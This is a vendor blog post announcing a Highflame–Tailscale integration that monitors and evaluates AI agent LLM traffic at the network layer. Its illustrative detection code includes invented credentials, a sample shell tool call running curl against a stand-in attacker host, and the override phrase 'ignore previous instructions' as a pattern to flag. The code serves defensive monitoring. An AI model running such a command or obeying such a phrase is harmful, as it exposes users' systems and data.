Highflame Technology Series

Highflame Partners with Tailscale to Help Secure AI Agents at the Network Layer

Sharath Rajasekar
AI Engineering
April 2, 2026

Securing AI Agents at the Network Layer

AI agents now generate thousands of LLM requests across developer machines, CI pipelines, and internal tooling. Each request can carry prompts, tool calls, secrets, or sensitive data. Yet in most organizations, there is little visibility into what those agents are actually doing. Today, we’re announcing a partnership between Highflame and Tailscale to change that. Together, we bring real-time AI security evaluation to the network layer. By integrating Aperture, Tailscale’s LLM traffic proxy, with Highflame’s security pipeline, organizations can monitor and evaluate LLM interactions across prompts, tool calls, and model responses flowing through their tailnet, without modifying agents.

The Story of an AI Request

To understand why this partnership matters, consider what happens when a developer opens a coding agent and starts working. The developer asks OpenAI Codex to investigate a failing test. The agent reads the test file, inspects the error log, and decides it needs more context. It calls an MCP tool to search GitHub issues, finds a related issue, reads the linked pull request, and formulates a fix. It writes the patch, runs the test suite, and reports back.

Thirty seconds of developer time. Twelve LLM requests behind the scenes.

Inside those requests are prompts that may contain database credentials copied from a config file, tool calls that pass secrets as arguments, shell commands composed autonomously by the model, and file reads that pull proprietary source code into external APIs. Each of these actions is a security-relevant event. And in most organizations today, none of them are visible to the security team.
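
To make that concrete, here is a sketch of what one of those requests might look like on the wire. Everything in it is illustrative: the model name, the tool, and the credentials are invented for this example, not taken from any real agent or provider.

```python
import json

# Illustrative only: one of the twelve requests from the scenario above.
# The agent has read config.py into its prompt, and a follow-up MCP tool
# call carries the same connection string as an argument. At the network
# level, both are ordinary JSON payloads.
llm_request = {
    "model": "example-model",  # placeholder model name
    "messages": [{
        "role": "user",
        "content": (
            "Why does test_checkout fail? Here is config.py:\n"
            "DATABASE_URL = 'postgres://admin:S3cr3t@db.internal:5432/prod'"
        ),
    }],
}

mcp_tool_call = {
    "name": "run_query",  # hypothetical MCP tool
    "arguments": {
        "dsn": "postgres://admin:S3cr3t@db.internal:5432/prod",
        "sql": "SELECT * FROM orders WHERE status = 'failed' LIMIT 5",
    },
}

print(json.dumps(llm_request, indent=2))
print(json.dumps(mcp_tool_call, indent=2))
```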

The developer is not doing anything wrong. The agent is doing exactly what it was asked to do. But between the developer’s intent and the model’s execution there is a gap where sensitive data leaks, prompt injections land, and policy violations go undetected, simply because nobody is watching.

Aperture by Tailscale: The Observation Point

Aperture (currently in alpha) is a centralized AI gateway that runs inside a Tailscale network. Instead of each developer managing their own API keys and connecting directly to LLM providers, AI traffic flows through Aperture, which is designed to transparently handle credential injection, request routing, session tracking, and telemetry capture.

What makes Aperture significant is its position: it sits on the network path between an organization’s AI tools and its model providers. Codex, Claude Code, Cline, Gemini CLI, custom agents: if it talks to an LLM, the traffic passes through Aperture. There is no opt-out, no SDK to install, and no agent to instrument. The observation point is the network itself.
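
From a developer’s seat, that can be as small as an endpoint change. A minimal sketch, assuming Aperture exposes an OpenAI-compatible endpoint on the tailnet; the hostname and key handling here are assumptions, not documented Aperture behavior:

```python
from openai import OpenAI

# Hypothetical: the client targets the Aperture gateway on the tailnet
# instead of the provider directly. Since Aperture is described as handling
# credential injection, the local key can be a placeholder; the real
# provider credential never lives on the developer machine. The hostname
# below is illustrative.
client = OpenAI(
    base_url="http://aperture.example-tailnet.ts.net/v1",  # assumed endpoint
    api_key="placeholder",  # assumed: real key injected by the gateway
)

response = client.chat.completions.create(
    model="gpt-4o",
    messages=[{"role": "user", "content": "Investigate the failing test."}],
)
print(response.choices[0].message.content)
```

Aperture gives organizations visibility into who is using AI, which models they are using, how often, and at what cost. But visibility answers only the question of what is happening.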

Closing the Security Loop

Is any of this activity dangerous?

A prompt that contains an AWS secret key appears identical to any other prompt at the network level. A tool call that exfiltrates a customer database is structurally indistinguishable from one that queries a public API. A model response carrying an injected instruction blends in with every other response. Telemetry alone cannot distinguish between safe and unsafe AI interactions. Dashboards can show volume, latency, and cost. They cannot show that the third request in a Codex session leaked production credentials, or that a tool call was manipulated by a prompt injection embedded in a document.
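
Telling those cases apart requires content inspection. As a deliberately tiny illustration (real evaluation uses far broader rule sets and models than one regex), an AWS access key ID follows a stable, documented format and can be flagged in prompt text:

```python
import re

# AWS access key IDs are 20 characters beginning with "AKIA" (a documented
# format). A single regex like this is only a toy stand-in for the class of
# checks an evaluation layer runs on prompt content.
AWS_ACCESS_KEY = re.compile(r"\bAKIA[0-9A-Z]{16}\b")

def flags_secret(prompt: str) -> bool:
    """Return True if the prompt appears to contain an AWS access key ID."""
    return AWS_ACCESS_KEY.search(prompt) is not None

# Both prompts look identical at the telemetry level: one request, similar
# size. Only inspecting the content separates them.
print(flags_secret("Summarize this log file for me."))                   # False
print(flags_secret("Use key AKIAIOSFODNN7EXAMPLE to read the bucket."))  # True
```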

This is the gap between observation and evaluation: between knowing that AI activity is happening and knowing whether that activity is safe. Application-layer solutions attempt to solve this. Guardrails can be embedded in agent frameworks. Policies can be enforced in the IDE or at a centralized MCP Gateway. Filters can run alongside model APIs. But they all share a fundamental limitation: they only protect agents that opt in. A new tool, an unmanaged device, or a custom script calling a model directly all remain invisible.

The network layer does not have this blind spot. If traffic flows through Aperture, it can be evaluated across agents, tools, and devices.

This is the gap Highflame and Tailscale set out to solve together. Tailscale built the network telemetry layer. Highflame built the security evaluation layer. On their own, each solves part of the problem. Together, they help teams better understand and evaluate AI activity at the network layer. When Aperture observes an LLM interaction, it captures the relevant context—the user’s identity, the prompt, the model response, and any tool calls with their arguments—and forwards it to Highflame in real time for analysis.

Highflame is designed to decompose the event and evaluate each component independently. Prompts are analyzed for injection and secret leakage. Tool calls are inspected for unsafe arguments and execution patterns. Responses are checked for signs of manipulation or policy violations. Each check is evaluated against the organization’s security policies. What appears as a single agent interaction becomes multiple security decisions, made automatically and without requiring changes to developer workflows.
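
As a sketch of what that decomposition could look like in practice (the event shape, check logic, and verdicts below are illustrative assumptions, not Highflame’s actual API):

```python
# Hypothetical sketch: one captured interaction fans out into independent
# security decisions, one per component. All fields and rules are invented
# for illustration.
from dataclasses import dataclass

@dataclass
class Finding:
    component: str  # "prompt" | "tool_call" | "response"
    verdict: str    # "allow" | "flag" | "block"
    reason: str

def evaluate_event(event: dict) -> list[Finding]:
    findings = []
    # 1. Prompt: injection and secret-leakage checks.
    if "AKIA" in event["prompt"]:
        findings.append(Finding("prompt", "block", "possible AWS credential"))
    # 2. Tool calls: unsafe arguments and execution patterns.
    for call in event.get("tool_calls", []):
        if call["name"] == "shell" and "curl" in call["arguments"].get("cmd", ""):
            findings.append(Finding("tool_call", "flag", "outbound shell transfer"))
    # 3. Response: signs of manipulation or policy violations.
    if "ignore previous instructions" in event.get("response", "").lower():
        findings.append(Finding("response", "flag", "injection-style instruction"))
    return findings

event = {
    "user": "dev@example.com",
    "prompt": "Fix the failing test. Config: AKIAIOSFODNN7EXAMPLE",
    "tool_calls": [{"name": "shell",
                    "arguments": {"cmd": "curl http://attacker.example/x"}}],
    "response": "Done.",
}
for finding in evaluate_event(event):
    print(finding)
```

The point is the fan-out: a single network event yields several independent, policy-scoped decisions.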

“AI agents are already operating across every layer of the enterprise, but security hasn’t caught up to where the activity actually happens. At Highflame, we focus on securing both the agent itself and the network it operates on. Partnering with Tailscale allows us to extend that protection to every AI interaction, without requiring developers to change how they work.”

Sharath Rajasekar, CEO, Highflame

“Aperture gives organizations a single, reliable control point for AI traffic. With Highflame, customers can take that further by understanding the security implications across prompts, tool calls, and model responses, turning visibility into something they can actually use.”

Avery Pennarun, CEO, Tailscale

Highflame Agent Control Platform: Securing the Agent and the Network

Many of the highest-risk AI interactions originate inside the agent itself, before a request ever reaches the model. MCP tools execute commands, access internal systems, and move data across boundaries. Code agents read files, construct prompts, and decide which tools to call. This is where intent is formed—and where risk begins.

Highflame was built to secure these agent-level interactions directly. At the agent layer, Highflame is designed to continuously assess an agent’s intent trajectory to determine whether it is moving toward a safe outcome or drifting into risky behavior such as data exfiltration, prompt injection, or unsafe command execution.

Rather than analyzing events in isolation, Highflame evaluates how prompts are constructed and whether they include sensitive data, which MCP tools are invoked and with what arguments, and how model outputs influence downstream actions like file writes or shell execution. This provides control over the agent's decision-making surface, not just the traffic it generates.
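
This post doesn’t describe Highflame’s internals, but the difference between scoring events in isolation and scoring a trajectory can be sketched. In the toy check below (all names and rules are invented for illustration), reading a sensitive file is benign on its own; reading it and then invoking an outbound tool is not:

```python
# Illustrative only: a toy "trajectory" check that evaluates steps in
# sequence rather than in isolation. A sensitive file read becomes risky
# only when it is later followed by an outbound action.
SENSITIVE_READS = {"read_file:.env", "read_file:config.py"}
OUTBOUND_TOOLS = {"http_post", "send_email"}

def trajectory_risk(steps: list[dict]) -> str:
    saw_sensitive_read = False
    for step in steps:
        key = f'{step["tool"]}:{step.get("target", "")}'
        if key in SENSITIVE_READS:
            saw_sensitive_read = True
        elif step["tool"] in OUTBOUND_TOOLS and saw_sensitive_read:
            return "block: sensitive read followed by outbound call"
    return "allow"

steps = [
    {"tool": "read_file", "target": ".env"},
    {"tool": "http_post", "target": "https://api.example.com/upload"},
]
print(trajectory_risk(steps))  # block: sensitive read followed by outbound call
```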

The integration with Tailscale extends that same security model to the network layer. Together, this creates a unified control plane that operates both within the agent, where actions are decided, and on the network, where those actions are executed.

Security is no longer limited to a single enforcement point. It can follow the entire lifecycle of an AI interaction, from prompt construction to tool execution to model response across multi-step workflows.

What This Means for Organizations

For security teams, this partnership closes a critical gap. Instead of relying on developers to self-report or hoping that every agent is instrumented, they gain a centralized, continuously evaluated view of AI activity.

For platform teams, it extends beyond visibility into stronger security governance, using the same infrastructure that already tracks usage and cost.

For developers, nothing changes. They continue using the tools they prefer. The security layer operates transparently in the background.

For compliance teams, interactions are logged with identity, context, and policy outcomes, creating the audit trail that modern AI systems increasingly require.

Getting Started

Organizations already running Tailscale Aperture can enable the Highflame integration by adding a few lines to their Aperture configuration. Detailed setup instructions are available in the Highflame + Aperture integration guide. For organizations using Highflame for MCP and Code Agent security, the Aperture integration extends the same control and decision engine to the network layer. This creates defense-in-depth, covering both the AI agent’s decision-making layer and the network path to models and tools.

Tailscale Aperture is currently in alpha and is intended for evaluation and testing. Features and integrations may change as the product evolves.

Learn more about Highflame for Code Agents here: https://highflame.com/code-agent-control-plane

Learn more about Aperture by Tailscale here: https://tailscale.com/use-cases/securing-ai

Want to try it out or sign up for a free trial?

Book A Demo
